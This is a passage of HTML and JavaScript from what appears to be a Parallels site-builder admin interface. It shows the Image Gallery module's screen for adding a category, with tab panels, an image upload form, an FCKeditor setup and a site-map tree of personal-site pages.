<td valign="top" style="padding-right: 10px;"><img id="StatusIcon" style="border-width:0px;" src="/skins/WinXPReloadedCompact/images/icon_stop.gif"></td>
<td width="100%" onclick="sb_status.showDetails();" id="StatusBar"><div id="StatusMessage">The page no longer exists.</div></td>
</tr></table></td></tr>
<tr><td style="width:100%; height:100%;"><table cellpadding="0" cellspacing="0" border="0" style="width:100%; height:100%;"><tr><td valign="top">
<input type="hidden" name="tab" value="main"><input type="hidden" name="id" value=""><table class="sb-formtable" cellpadding="0" cellspacing="0" width="100%" border="0">
<tr class="sb-formtableheader"><th valign="bottom" align="left" class="sb-formtableheader-th" style="width: 100%;"><table style="width:100%;" cellpadding="0" cellspacing="0" border="0" class="sb-formtable"><tr><td valign="top" style="width:100%;"><table border="0" cellspacing="0" cellpadding="0"><tr>
<td><table border="0" cellspacing="0" cellpadding="0" style="cursor:default;width:10px; height: 21px;" class="TabLabelSelectedStyle" id="main" onclick="javascript:imageCategoryToogle('sb_panel_1', this);"><tr>
<td><img src="/skins/WinXPReloadedCompact/images/tabLeftOn.gif" alt="" id="main_IL"></td>
<td class="sb-button-tabs-text" style="white-space:nowrap;width:100%;background-image:url(/skins/WinXPReloadedCompact/images/tabMiddleOn.gif);background-repeat:repeat-x scroll 0px; padding-left: 5px; padding-right: 5px;" id="main_T">Main Properties</td>
<td><img src="/skins/WinXPReloadedCompact/images/tabRightOn.gif" id="main_IR" alt=""></td>
</tr></table></td>
<td><table border="0" cellspacing="0" cellpadding="0" style="cursor:pointer;width:10px;height: 21px;" class="TabLabelDefaultStyle" id="description" onclick="javascript:imageCategoryToogle('sb_panel_1', this);"><tr>
<td><img src="/skins/WinXPReloadedCompact/images/tabLeftOff.gif" alt="" id="description_IL"></td>
<td class="sb-button-tabs-text" style="white-space:nowrap;width:100%;background-image:url(/skins/WinXPReloadedCompact/images/tabMiddleOff.gif);background-repeat:repeat-x scroll 0px; padding-left: 5px; padding-right: 5px;" id="description_T">Description</td>
<td><img src="/skins/WinXPReloadedCompact/images/tabRightOff.gif" id="description_IR" alt=""></td>
</tr></table></td>
</tr></table></td></tr></table></th></tr>
<tr><td style="padding: 10px;" class="sb-page">
<div style="display:block;" id="mainContent">
<script type="text/javascript" src="/modules/ImageGallery/js/validate.js?5.0.0.2009110318"></script><table cellpadding="0" cellspacing="0" border="0" class="control-title-input">
<tr>
<td class="title-block">
<label class="name" for="name">Name</label><span id="name_asterix" class="sb-asterix" style="">
               ..*
           </span>
</td>
<td class="input-block"><input type="text" size="25" maxlength="50" class="sb-input" id="name" name="name" onblur="showAsterix(this.id);"></td>
<td></td>
<td></td>
</tr>
<tr>
<td class="title-block"><label class="name">Current image</label></td>
<td class="input-block">
<table style="width: 102px; height: 70px; background-color: #A4A4A4;"><tr><td valign="middle" align="center"><span style="vertical-align: middle; color: #FFFFFF;"><b>No image</b></span></td></tr></table>
<input type="hidden" name="image" value="">
</td>
<td></td>
<td></td>
</tr>
<tr>
<td class="title-block"><label class="name">New image</label></td>
<td class="input-block"><input type="file" size="25" maxlength="255" class="sb-input" name="image"></td>
<td style="padding-left:5px;"><table cellpadding="0" cellspacing="0" border="0" style="
                       cursor: pointer;" class="" id="" onclick='setWizardFormAction("/Wizard/Edit/Modules/ImageGallery/Category/Image/Upload");wizardFormSubmit();'><tr>
<td align="right" style="padding:0px;"><img src="/skins/WinXPReloadedCompact/images/button_left.gif" style="border-width:0px;" alt=""></td>
<td class="" style="white-space: nowrap; text-align: center; background-image: url(/skins/WinXPReloadedCompact/images/button_middle.gif); padding: 0px; padding-right: 4px;padding-left: 4px;" id="MainText">Upload</td>
<td align="left" style="padding: 0px;"><img src="/skins/WinXPReloadedCompact/images/button_right.gif" style="border-width:0px;" alt=""></td>
</tr></table></td>
<td style="padding-left:5px;"></td>
</tr>
</table>
</div>
<div style="display:none;" id="descriptionContent">
<label class="name"></label><script type="text/javascript" src="/wysiwyg/fckeditor.js?5.0.0.2009110318"></script><script language="JavaScript" type="text/javascript">
           function Init_Wysiwyg_description() {
               if (!Wysiwyg_description) {
                   Wysiwyg_description = new FCKeditor('Wysiwyg_description', '100%', '');
                   Wysiwyg_description.BasePath = '/wysiwyg//';
                   Wysiwyg_description.Config["CustomConfigurationsPath"] = Wysiwyg_description.BasePath + "/custom/config/modules/default.js?5.0.0.2009110318";
                   Wysiwyg_description.Config["SkinPath"] = Wysiwyg_description.BasePath + 'editor/skins/silver/';
                   Wysiwyg_description.ToolbarSet = "module";
                   
                   Wysiwyg_description.Config["LinkUpload"] = false;
                   Wysiwyg_description.Config["LinkBrowser"] = false;
                   Wysiwyg_description.Config["ImageBrowser"] = false;
                   
                   Wysiwyg_description.Config["ImageUploadURL"] = '/Wizard/Edit/Wysiwyg/ImageUpload';
                   
                   Wysiwyg_description.Config["SmileyPath"] = '/images/modules/smiley/';
                   
                   Wysiwyg_description.Config["AutoDetectLanguage"] = false;
                   Wysiwyg_description.Config["DefaultLanguage"]="en";
                   Wysiwyg_description.Config["Version"]="5.0.0.2009110318";
                   Wysiwyg_description.ReplaceTextarea();
               }
           }
           var Wysiwyg_description=null;
           
               RegisterOnloadAction('sb_panel_1.registerPageOnloadAction("description","Init_Wysiwyg_description();");');
           </script><textarea id="Wysiwyg_description" name="description" style="border-width: 0px; height: 100%;"></textarea><script type="text/javascript">
               SbAppendLocaleKey('uploadImageToServer', 'Please upload the image to the server.');
           
               SbAppendLocaleKey('invalidFileType', 'Invalid file type.');
           
               SbAppendLocaleKey('selectFile', 'Please select a file to upload.');
           </script>
</div>
</td></tr>
<tr class="sb-formtablefooter"><th style="width: 100%;">..</th></tr>
</table>
<script type="text/javascript">imgPath='/skins/WinXPReloadedCompact/images/';</script><script type="text/javascript" src="/js/tabpanel.js?5.0.0.2009110318"></script><script type="text/javascript">sb_panel_1 = new TabPanel();
           sb_panel_1.setupAllPages();
       </script><table cellpadding="0" cellspacing="0" border="0" style="width: 100%;"><tr><td style="padding: 0 10px;"><table cellpadding="0" cellspacing="0" class="form-tools-container"><tr><td><table cellpadding="0" cellspacing="0" class="ok-cancel-container"><tr>
<td><table cellspacing="0" cellpadding="0" border="0" style="cursor: pointer; width: 90px;" onclick="if (validateCategory()){wizardFormSubmit();}"><tr>
<td style="width: 1px;"><img src="/skins/WinXPReloadedCompact/images/button_ok_left.gif"></td>
<td style="background-image: url(/skins/WinXPReloadedCompact/images/button_ok_middle.gif); background-repeat:repeat-x; width: 1px; padding-left: 5px;"><img src="/skins/WinXPReloadedCompact/icons/ok.gif"></td>
<td style="background-image: url(/skins/WinXPReloadedCompact/images/button_ok_middle.gif);" align="center" class="sb-button-ok">OK</td>
<td style="width: 1px;"><img src="/skins/WinXPReloadedCompact/images/button_ok_right.gif"></td>
</tr></table></td>
<td class="cancel-area"><table onclick="document.location.href='/Wizard/Edit/Modules/ImageGallery?tab=categories';" style="cursor: pointer; width: 90px;" border="0" cellpadding="0" cellspacing="0"><tr>
<td style="width: 1px;"><img src="/skins/WinXPReloadedCompact/images/button_left.gif"></td>
<td style="background-image: url(/skins/WinXPReloadedCompact/images/button_middle.gif); background-repeat:repeat-x; width: 1px; padding-left: 5px;"><img src="/skins/WinXPReloadedCompact/icons/cancel.gif"></td>
<td style="background-image: url(/skins/WinXPReloadedCompact/images/button_middle.gif);" align="center" class="sb-button-cancel">Cancel</td>
<td style="width: 1px;"><img src="/skins/WinXPReloadedCompact/images/button_right.gif"></td>
</tr></table></td>
</tr></table></td></tr></table></td></tr></table>
</td></tr></table></td></tr>
</table></td>
<td style="width: 10px; padding-top:10px; height:100%;"><div style="width:10px; height:100%; filter:alpha(opacity=25); background-color:black; opacity:0.25; display: table;"><span></span></div></td>
</tr></table></td></tr>
<tr><td style="padding-left:10px; height: 10px;"><div style="width:100%; height:10px; filter:alpha(opacity=25); background-color:black; opacity:0.25;"><span></span></div></td></tr>
</table></div>
<script type="text/javascript" language="javascript">
           SbInitModalForm('modalForm');
       </script><table cellpadding="0" cellspacing="0" border="0" style="width: 100%; height: 100%">
<tr id="TRHeader"><td COLSPAN="2">
<table cellpadding="0" cellspacing="0" border="0" width="100%" class="sb-header-top-container"><tr><td><table cellpadding="0" cellspacing="0" border="0" style="width: 100%; height: 100%;" class="sb-header-top"><tr>
<td width="100%"><div style="width: 205px; text-align: center;"><img align="middle" style="cursor: pointer;" alt="" border="0" src="/skins/WinXPReloadedCompact/images/def_sb_logo.gif?5.0.0.2009110318" onclick="window.open('http://www.parallels.com', '_new'); return false;"></div></td>
<td><table cellspacing="0" cellpadding="0" border="0" style="border-width:0px;border-collapse:collapse;"><tr>
<td><table cellpadding="0" cellspacing="0" border="0" type="button" onclick="return sbNavigationObject.go('/Wizard/Start');" style="cursor: pointer;"><tr>
<td><img src="/skins/WinXPReloadedCompact/images/steps_separator_left.gif"></td>
<td style="background-image:url(/skins/WinXPReloadedCompact/images/steps_bg.gif);padding-left:5px;padding-right:3px;"><img src="/skins/WinXPReloadedCompact/images/steps_start_bullet.gif"></td>
<td class="sb-steps-text" style="padding: 0 5px 0 2px; background-image:url(/skins/WinXPReloadedCompact/images/steps_bg.gif);white-space:nowrap;">Start</td>
<td><img src="/skins/WinXPReloadedCompact/images/steps_separator.gif"></td>
</tr></table></td>
<td><table cellpadding="0" cellspacing="0" border="0" type="button" onclick="return sbNavigationObject.go('/Wizard/Design');" style="cursor: pointer;"><tr>
<td style="background-image:url(/skins/WinXPReloadedCompact/images/steps_bg.gif);padding-left:5px;padding-right:3px;"><img src="/skins/WinXPReloadedCompact/images/steps_design_bullet.gif"></td>
<td class="sb-steps-text" style="padding: 0 5px 0 2px; background-image:url(/skins/WinXPReloadedCompact/images/steps_bg.gif);white-space:nowrap;">Design</td>
<td><img src="/skins/WinXPReloadedCompact/images/steps_separator.gif"></td>
</tr></table></td>
<td><table cellpadding="0" cellspacing="0" border="0" type="button" onclick="return sbNavigationObject.go('/Wizard/Pages');" style="cursor: pointer;"><tr>
<td style="background-image:url(/skins/WinXPReloadedCompact/images/steps_bg.gif);padding-left:5px;padding-right:3px;"><img src="/skins/WinXPReloadedCompact/images/steps_pages_bullet.gif"></td>
<td class="sb-steps-text" style="padding: 0 5px 0 2px; background-image:url(/skins/WinXPReloadedCompact/images/steps_bg.gif);white-space:nowrap;">Pages</td>
</tr></table></td>
<td><table cellpadding="0" cellspacing="0" border="0" type="button"><tr>
<td><img src="/skins/WinXPReloadedCompact/images/steps_separator_al.gif"></td>
<td style="background-image:url(/skins/WinXPReloadedCompact/images/steps_abg.gif);padding-left:5px;padding-right:3px;"><img src="/skins/WinXPReloadedCompact/images/steps_edit_abullet.gif"></td>
<td class="sb-steps-text-active" style="padding: 0 5px 0 2px; background-image:url(/skins/WinXPReloadedCompact/images/steps_abg.gif);">Edit</td>
<td><img src="/skins/WinXPReloadedCompact/images/steps_separator_ar.gif"></td>
</tr></table></td>
<td><table cellpadding="0" cellspacing="0" border="0" type="button" onclick="return sbNavigationObject.go('/Wizard/Publish');" style="cursor: pointer;"><tr>
<td style="background-image:url(/skins/WinXPReloadedCompact/images/steps_bg.gif);padding-left:5px;padding-right:3px;"><img src="/skins/WinXPReloadedCompact/images/steps_publish_bullet.gif"></td>
<td class="sb-steps-text" style="padding: 0 5px 0 2px; background-image:url(/skins/WinXPReloadedCompact/images/steps_bg.gif);white-space:nowrap;">Publish</td>
<td><img src="/skins/WinXPReloadedCompact/images/steps_separator_right.gif"></td>
</tr></table></td>
</tr></table></td>
<td align="right" class="sb-header-company-logo"><img style="cursor: pointer" onclick="window.open('http://www.parallels.com', '_new'); return false;" border="0" src="/skins/WinXPReloadedCompact/images/def_parallels_logo_wizard.gif"></td>
</tr></table></td></tr></table>
<table cellpadding="0" cellspacing="0" border="0" width="100%" class="sb-header-bottom"><tr>
<td style="padding-left: 10px;">
<table cellpadding="0" cellspacing="0" border="0" style="
                       filter:alpha(opacity=40); opacity: 0.4;
                       " class="" id="saveChangesButton" onclick=""><tr>
<td align="right" style="padding:0px;"><img src="/skins/WinXPReloadedCompact/images/button_left.gif" style="border-width:0px;" alt=""></td>
<td style="background-image:url(/skins/WinXPReloadedCompact/images/button_middle.gif);padding-left:5px;padding-right:5px;" class=""><img src="/skins/WinXPReloadedCompact/icons/save_icon.gif"></td>
<td class="" style="white-space: nowrap; text-align: center; background-image: url(/skins/WinXPReloadedCompact/images/button_middle.gif); padding: 0px; padding-right: 4px;padding-left: 4px;" id="saveChangesButtonMainText">Save Changes</td>
<td align="left" style="padding: 0px;"><img src="/skins/WinXPReloadedCompact/images/button_right.gif" style="border-width:0px;" alt=""></td>
</tr></table>
<script type="text/javascript">
                           sbApplyChangesObject.addListener(enableSaveChangesButton);
                       </script>
</td>
<td style="padding-left: 10px; width: 100%;" onclick="sb_status.showDetails();" id="StatusBar">
<table cellpadding="0" cellspacing="3" width="100%" border="0" style="display:inline-block;width:100%;"><tr>
<td valign="middle"><img id="StatusIcon" style="border-width:0px;" src="/skins/WinXPReloadedCompact/images/icon_stop.gif"></td>
<td valign="middle" width="100%" style="padding-left: 10px;"><div id="StatusMessage" class="sb-statusbar-text">The page no longer exists.</div></td>
</tr></table>
<script type="text/javascript" language="javascript" src="/js/Wizard/Status.js?5.0.0.2009110318"></script><script type="text/javascript" language="javascript">
                       sb_status = new SB_Status('/skins/WinXPReloadedCompact');
                       </script>
</td>
<td class="sb-header-bottom-right"><table cellspacing="0" cellpadding="0" border="0" style="height: 100%;"><tr><td><a style="text-decoration: none" onclick="javascript:try{window.open('http://download1.parallels.com/PPSMBE/10.0.0/Doc/help.htm?locale=en-US&amp;article=/Wizard/Edit/Modules/ImageGallery/Category/Add&amp;help_type=user','_blank')}catch(e){}; void(0);" href="#"><table cellpadding="0" cellspacing="0" border="0" type="button" style="height:100%;"><tr>
<td style="padding: 5px;"><img style="border-width:0px;" width="16" height="16" src="/skins/WinXPReloadedCompact/icons/help.png"></td>
<td class="sb-tools-text" style="padding-right:10px;">Help</td>
</tr></table></a></td></tr></table></td>
</tr></table>
</td></tr>
<tr><td class="sb-wizard-layout-content">
<script type="text/javascript" src="/js/Wizard/panel_toogle.js?5.0.0.2009110318"></script><table border="0" cellpadding="0" cellspacing="0" style="height: 100%;width:100%" align="center"><tr><td style="vertical-align: top; " align="center"><table cellpadding="0" cellspacing="0" border="0" style="height: 100%;width:100%"><tr>
<td valign="top">
<input type="hidden" id="LeftPanelDiv_hidden" value="false"><input type="hidden" id="LeftPanelDiv_show_action" value="localeCode=en_US&amp;section=Wizard_Edit&amp;key=showSiteMap"><input type="hidden" id="LeftPanelDiv_hide_action" value="localeCode=en_US&amp;section=Wizard_Edit&amp;key=hideSiteMap"><table style="height:100%;" cellpadding="0" cellspacing="0" border="0" class="sb-edit-panel"><tr>
<td><div id="LeftPanelDiv" style="height: 100%; display: block;"><table width="200" cellspacing="8" cellpadding="8" border="0">
<tr valign="top" height="1"><td><b class="sb-text">Site map</b></td></tr>
<tr class="sb-edit-panel-block"><td class="sb-edit-panel-block-border" id="siteMapTd" valign="top" height="1">
<script src="/js/Wizard/Edit.js?5.0.0.2009110318" language="javascript"></script><script type="text/javascript" language="javascript"><!--
                                           var currentPageId = '1iqsyi3rp1o';
                                           var action = '/Wizard/Edit';
                                           Event.observe(window, 'load', siteMapOnResize);
                                           Event.observe(window, 'resize', siteMapOnResize);
                                           //--></script><table border="0" cellpadding="0" cellspacing="0" width="100%" height="100%" style="table-layout: fixed;"><tr><td valign="top">
<script type="text/javascript" language="javascript" src="/js/pages_tree.js?5.0.0.2009110318"></script><div id="edit" style="white-space: nowrap; overflow-x: hidden; overflow-y: auto; width:100%; height:100%;">
<script type="text/javascript" language="javascript"><!--
                   SbInitTree('edit', 'true', 'true', '', '', 'true', onNodeSelect, null, null, null);
                   var tree = document.getElementById('edit');
                   
               //--></script><div id="q485ez4jvyq" valign="middle">
<img id="q485ez4jvyqState" border="0" width="19px" align="middle" src="/images/blank.gif"><img id="q485ez4jvyqLine" border="0" width="19px" align="middle" src="/images/blank.gif"><input id="q485ez4jvyqCheck" type="checkbox" style="display: inline; vertical-align: middle;"><img id="q485ez4jvyqIcon" border="0" width="16" height="16" style="display: inline; vertical-align: middle;" src="/skins/WinXPReloadedCompact/icons/HTMLPageIcon.gif"><span id="q485ez4jvyqSpan" style="vertical-align: middle;">Home</span>
</div>
<script type="text/javascript" language="javascript">
           SbInitNode('edit', 'q485ez4jvyq', 'page1.php', 'Simple', '', '', 'visible');
       </script><div id="hwal3pvmvz3" valign="middle">
<img id="hwal3pvmvz3State" border="0" width="19px" align="middle" src="/images/blank.gif"><img id="hwal3pvmvz3Line" border="0" width="19px" align="middle" src="/images/blank.gif"><input id="hwal3pvmvz3Check" type="checkbox" style="display: inline; vertical-align: middle;"><img id="hwal3pvmvz3Icon" border="0" width="16" height="16" style="display: inline; vertical-align: middle;" src="/skins/WinXPReloadedCompact/icons/HTMLPageIcon.gif"><span id="hwal3pvmvz3Span" style="vertical-align: middle;">About Me</span>
</div>
<script type="text/javascript" language="javascript">
           SbInitNode('edit', 'hwal3pvmvz3', 'page2.php', 'Simple', '', '', 'visible');
       </script><div id="b1ynn2c224e" valign="middle">
<img id="b1ynn2c224eState" border="0" width="19px" align="middle" src="/images/blank.gif"><img id="b1ynn2c224eLine" border="0" width="19px" align="middle" src="/images/blank.gif"><input id="b1ynn2c224eCheck" type="checkbox" style="display: inline; vertical-align: middle;"><img id="b1ynn2c224eIcon" border="0" width="16" height="16" style="display: inline; vertical-align: middle;" src="/skins/WinXPReloadedCompact/icons/HTMLPageIcon.gif"><span id="b1ynn2c224eSpan" style="vertical-align: middle;">My Family</span>
</div>
<script type="text/javascript" language="javascript">
           SbInitNode('edit', 'b1ynn2c224e', 'page3.php', 'Simple', '', '', 'visible');
       </script><div id="1iqsyi3rp1o" valign="middle">
<img id="1iqsyi3rp1oState" border="0" width="19px" align="middle" src="/images/blank.gif"><img id="1iqsyi3rp1oLine" border="0" width="19px" align="middle" src="/images/blank.gif"><input id="1iqsyi3rp1oCheck" type="checkbox" style="display: inline; vertical-align: middle;"><img id="1iqsyi3rp1oIcon" border="0" width="16" height="16" style="display: inline; vertical-align: middle;" src="/modules/ImageGallery/images/icon.gif"><span id="1iqsyi3rp1oSpan" style="vertical-align: middle;">Photos</span>
</div>
<script type="text/javascript" language="javascript">
           SbInitNode('edit', '1iqsyi3rp1o', 'page4.php', 'ImageGallery', 'true', '', 'visible');
       </script><div id="1mhpsivotpo" valign="middle">
<img id="1mhpsivotpoState" border="0" width="19px" align="middle" src="/images/blank.gif"><img id="1mhpsivotpoLine" border="0" width="19px" align="middle" src="/images/blank.gif"><input id="1mhpsivotpoCheck" type="checkbox" style="display: inline; vertical-align: middle;"><img id="1mhpsivotpoIcon" border="0" width="16" height="16" style="display: inline; vertical-align: middle;" src="/skins/WinXPReloadedCompact/icons/HTMLPageIcon.gif"><span id="1mhpsivotpoSpan" style="vertical-align: middle;">Resume</span>
</div>
<script type="text/javascript" language="javascript">
           SbInitNode('edit', '1mhpsivotpo', 'page5.php', 'Simple', '', '', 'visible');
       </script><div id="q05ufw2vwxb" valign="middle">
<img id="q05ufw2vwxbState" border="0" width="19px" align="middle" src="/images/blank.gif"><img id="q05ufw2vwxbLine" border="0" width="19px" align="middle" src="/images/blank.gif"><input id="q05ufw2vwxbCheck" type="checkbox" style="display: inline; vertical-align: middle;"><img id="q05ufw2vwxbIcon" border="0" width="16" height="16" style="display: inline; vertical-align: middle;" src="/skins/WinXPReloadedCompact/icons/HTMLPageIcon.gif"><span id="q05ufw2vwxbSpan" style="vertical-align: middle;">Favorite Links</span>
</div>
<script type="text/javascript" language="javascript">
           SbInitNode('edit', 'q05ufw2vwxb', 'page6.php', 'Simple', '', '', 'visible');
       </script><div id="pp2btyiv601" valign="middle">
<img id="pp2btyiv601State" border="0" width="19px" align="middle" src="/images/blank.gif"><img id="pp2btyiv601Line" border="0" width="19px" align="middle" src="/images/blank.gif"><input id="pp2btyiv601Check" type="checkbox" style="display: inline; vertical-align: middle;"><img id="pp2btyiv601Icon" border="0" width="16" height="16" style="display: inline; vertical-align: middle;" src="/skins/WinXPReloadedCompact/icons/HTMLPageIcon.gif"><span id="pp2btyiv601Span" style="vertical-align: middle;">Contact Me</span>
</div>
<script type="text/javascript" language="javascript">
           SbInitNode('edit', 'pp2btyiv601', 'page7.php', 'Simple', '', '', 'visible');
       </script>
</div>
<script type="text/javascript" language="javascript"><!--
               SbRefreshTree('edit');
           //--></script>
</td></tr></table>
<script type="text/javascript" language="javascript">
                           var knownPagesFileNames = new Array('index');
                           knownPagesFileNames.push('page1');

       registerPageEditView('q485ez4jvyq', '/Wizard/Edit/Html');
       knownPagesFileNames.push('page2');

       registerPageEditView('hwal3pvmvz3', '/Wizard/Edit/Html');
       knownPagesFileNames.push('page3');

       registerPageEditView('b1ynn2c224e', '/Wizard/Edit/Html');
       

       registerPageEditView('1iqsyi3rp1o', '/Wizard/Edit/Modules/ImageGallery');
       knownPagesFileNames.push('page5');

       registerPageEditView('1mhpsivotpo', '/Wizard/Edit/Html');
       knownPagesFileNames.push('page6');

       registerPageEditView('q05ufw2vwxb', '/Wizard/Edit/Html');
       knownPagesFileNames.push('page7');

       registerPageEditView('pp2btyiv601', '/Wizard/Edit/Html');
       </script>
</td></tr>
<tr class="sb-edit-panel-block"><td class="sb-edit-panel-block-border" id="pageInfoTd" valign="top" height="1">
<script>
           sbNavigationObject.registerOnSubmitFunction(validateForm);
       </script><table height="160px" width="100%" border="0" cellpadding="0" cellspacing="0" style="table-layout: fixed;">
<tr><td style="padding-bottom: 5px;">
<span class="sb-text">Page title</span><span style="color:Red; width: 10px;">*</span><br><input id="pageTitle" name="pageTitle" type="text" maxlength="255" class="sb-text" style="border-color:#999EA1;border-width:1px;border-style:Solid;width:100%;" onchange="self.sbApplyChangesObject.registerChange();" value="Photos">
</td></tr>
<tr><td style="padding-bottom: 5px;">
<span class="sb-text">Page file name</span><span style="color:Red; width: 10px;">*</span><br><input id="pageFileName" name="pageFileName" type="text" maxlength="255" class="sb-text" style="border-color:#999EA1;border-width:1px;border-style:Solid;width:140px;" onchange="self.sbApplyChangesObject.registerChange();" value="page4"><span class="sb-text">.php</span>
</td></tr>
<tr><td style="padding-bottom: 5px;">
<span class="sb-text">Page keywords</span><br><textarea id="pageKeywords" name="pageKeywords" rows="2" cols="20" class="sb-text" style="border-color:#999EA1;border-width:1px;border-style:Solid;width:100%;" onchange="self.sbApplyChangesObject.registerChange();"></textarea>
</td></tr>
<tr><td style="padding-bottom: 5px;">
<span class="sb-text">Page description</span><br><textarea id="pageDescription" name="pageDescription" rows="2" cols="20" class="sb-text" style="border-color:#999EA1;border-width:1px;border-style:Solid;width:100%;" onchange="self.sbApplyChangesObject.registerChange();"></textarea>
</td></tr>
<tr><td>
<span style="color:Red; padding-right: 5px;">*</span><span class="sb-text">Required fields</span><br>
</td></tr>
<tr><td style="height: 20px;"><img width="100%" height="1" src="/skins/WinXPReloadedCompact/images/line.gif"></td></tr>
<tr><td><table cellpadding="0" cellspacing="0" border="0" class="control-input-title"><tr>
<td class="input-block"><input id="pageShowInNavigation" type="checkbox" name="pageShowInNavigation" onchange="self.sbApplyChangesObject.registerChange();" class="sb-check" checked></td>
<td class="title-block"><label class="name" for="pageShowInNavigation">Show this page in site map</label></td>
</tr></table></td></tr>
<tr><td align="center" style="padding-top: 10px">
<table cellpadding="0" cellspacing="0" border="0" style="
                       filter:alpha(opacity=40); opacity: 0.4;
                       width: 100%" class="" id="plainPageButton" onclick=""><tr>
<td align="right" style="padding:0px;"><img src="/skins/WinXPReloadedCompact/images/button_left.gif" style="border-width:0px;" alt=""></td>
<td class="sb-button-disabled" style="white-space: nowrap; text-align: center; background-image: url(/skins/WinXPReloadedCompact/images/button_middle.gif); padding: 0px; padding-right: 4px;padding-left: 4px;" id="plainPageButtonMainText">Remove Design Template</td>
<td align="left" style="padding: 0px;"><img src="/skins/WinXPReloadedCompact/images/button_right.gif" style="border-width:0px;" alt=""></td>
</tr></table>
<input type="hidden" id="isPlainPage" name="isPlainPage" value="0">
</td></tr>
</table>
<input type="hidden" name="currentPageId" id="page" value="1iqsyi3rp1o">
</td></tr>
</table></div></td>
<td style="height: 100%;" class="sb-edit-panel-hidebackground" id="LeftPanelDiv_Bar"><div id="ButtonHideTree" onclick="toggleLeftPanel('/skins/WinXPReloadedCompact/images/right.gif', '/skins/WinXPReloadedCompact/images/left.gif');" align="center" style="width: 21px; height: 100%; border: 0px solid #7D7D7D; float: left; cursor: hand; cursor: pointer;">
<img id="LeftPanelDiv_bullet" class="sb-edit-panel-arrow" style="border-width:0px;" src="/skins/WinXPReloadedCompact/images/left.gif"><br><img id="LeftPanelDiv_Text" style="border-width:0px;" src="/localizedimage.php?localeCode=en_US&amp;section=Wizard_Edit&amp;key=hideSiteMap">
</div></td>
</tr></table>
</td>
<td valign="top" style="width: 100%; height: 100%">
<div class="sb-edit-modulename">
<img style="border-width:0px;" src="/modules/ImageGallery/images/icon.gif"><span class="sb-page-title" style="padding-left: 9px;">Image Gallery</span>
</div>
<table class="sb-formtable" cellspacing="0" border="0" style="border-collapse:collapse;height: 99%; width: 100%;"><tr><td valign="top">
<input type="hidden" name="tab" value="image_upload"><input type="hidden" name="pageNum" value=""><input type="hidden" name="pageSize" value=""><input type="hidden" name="orderBy" value=""><input type="hidden" name="orderType" value=""><input type="hidden" name="viewAction" id="viewAction" value="/Wizard/Edit"><table class="sb-formtable" cellpadding="0" cellspacing="0" width="100%" border="0">
<tr class="sb-formtableheader"><th valign="bottom" align="left" class="sb-formtableheader-th" style="width: 100%;"><table style="width:100%;" cellpadding="0" cellspacing="0" border="0" class="sb-formtable"><tr><td valign="top" style="width:100%;"><table border="0" cellspacing="0" cellpadding="0"><tr>
<td><table border="0" cellspacing="0" cellpadding="0" style="cursor:pointer;width:10px;height: 21px;" class="TabLabelDefaultStyle" id="image_management" onclick="javascript:tabPanelToggle('sb_panel', this);"><tr>
<td><img src="/skins/WinXPReloadedCompact/images/tabLeftOff.gif" alt="" id="image_management_IL"></td>
<td class="sb-button-tabs-text" style="white-space:nowrap;width:100%;background-image:url(/skins/WinXPReloadedCompact/images/tabMiddleOff.gif);background-repeat:repeat-x scroll 0px; padding-left: 5px; padding-right: 5px;" id="image_management_T">Images</td>
<td><img src="/skins/WinXPReloadedCompact/images/tabRightOff.gif" id="image_management_IR" alt=""></td>
</tr></table></td>
<td><table border="0" cellspacing="0" cellpadding="0" style="cursor:default;width:10px; height: 21px;" class="TabLabelSelectedStyle" id="categories" onclick="javascript:tabPanelToggle('sb_panel', this);"><tr>
<td><img src="/skins/WinXPReloadedCompact/images/tabLeftOn.gif" alt="" id="categories_IL"></td>
<td class="sb-button-tabs-text" style="white-space:nowrap;width:100%;background-image:url(/skins/WinXPReloadedCompact/images/tabMiddleOn.gif);background-repeat:repeat-x scroll 0px; padding-left: 5px; padding-right: 5px;" id="categories_T">Categories</td>
<td><img src="/skins/WinXPReloadedCompact/images/tabRightOn.gif" id="categories_IR" alt=""></td>
</tr></table></td>
<td><table border="0" cellspacing="0" cellpadding="0" style="cursor:pointer;width:10px;height: 21px;" class="TabLabelDefaultStyle" id="settings" onclick="javascript:tabPanelToggle('sb_panel', this);"><tr>
<td><img src="/skins/WinXPReloadedCompact/images/tabLeftOff.gif" alt="" id="settings_IL"></td>
<td class="sb-button-tabs-text" style="white-space:nowrap;width:100%;background-image:url(/skins/WinXPReloadedCompact/images/tabMiddleOff.gif);background-repeat:repeat-x scroll 0px; padding-left: 5px; padding-right: 5px;" id="settings_T">Settings</td>
<td><img src="/skins/WinXPReloadedCompact/images/tabRightOff.gif" id="settings_IR" alt=""></td>
</tr></table></td>
</tr></table></td></tr></table></th></tr>
<tr><td style="padding: 10px;" class="sb-page">
<div style="display:none;" id="image_managementContent"></div>
<div style="display:block;" id="categoriesContent">
<script src="/modules/ImageGallery/js/categories.js?5.0.0.2009110318" type="text/javascript"></script><fieldset>
<legend>Tools</legend>
<div class="fieldset-block"><table cellspacing="0" border="0" style="border-collapse:collapse;"><tr><td valign="top"><table cellpadding="0" cellspacing="0" border="0" class="sb-button-tool-table" onclick='javascript: sbApplyChangesObject.registerForcedSaving();sbNavigationObject.go("/Wizard/Edit/Modules/ImageGallery/Category/Add");' style="cursor: pointer; width: 80px;">
<tr>
<td rowspan="2" style="width:0;"></td>
<td align="center" valign="middle"><img border="0" alt="" src="/skins/WinXPReloadedCompact/icons/category.png"></td>
</tr>
<tr><td align="center" class="sb-button-tool-text">Add New Category</td></tr>
</table></td></tr></table></div>
</fieldset>
<script type="text/javascript" src="/js/list.js?5.0.0.2009110318"></script><script language="javascript">
function pagedListDoSort(tab, orderBy, orderType) {
   var formName = 'SB_WizardForm';
   var form = document.forms[formName];
   form.action = '/Wizard/Edit/Modules/ImageGallery/Category/Add';
   form.tab.value = tab;
   form.pageNum.value = 1;
   form.orderBy.value = orderBy;
   form.orderType.value = orderType;
   form.submit();
}
</script><fieldset>
<legend>Categories</legend>
<div class="fieldset-block">
<div class="list-tool-block"><table cellspacing="0" cellpadding="0" border="0" class="link-button-container"><tr>
<td class="link-button-image-area"><a href="#" onclick="deleteCategories()"><img border="0" alt="" src="/skins/WinXPReloadedCompact/icons/delete.png"></a></td>
<td class="link-button-text-area"><a href="#" style="color: Black;" onclick="deleteCategories()">Remove Selected</a></td>
</tr></table></div>
<div class="clear"></div>
<table cellpadding="0" cellspacing="0" border="0"><tr>
<td></td>
<td>
<script language="javascript">
function pagedListShowAll(tab) {
   var formName = 'SB_WizardForm';
   var form = document.forms[formName];
   form.tab.value = tab;
   form.action = '/Wizard/Edit/Modules/ImageGallery/Category/Add';

   if (form.filterValue) {
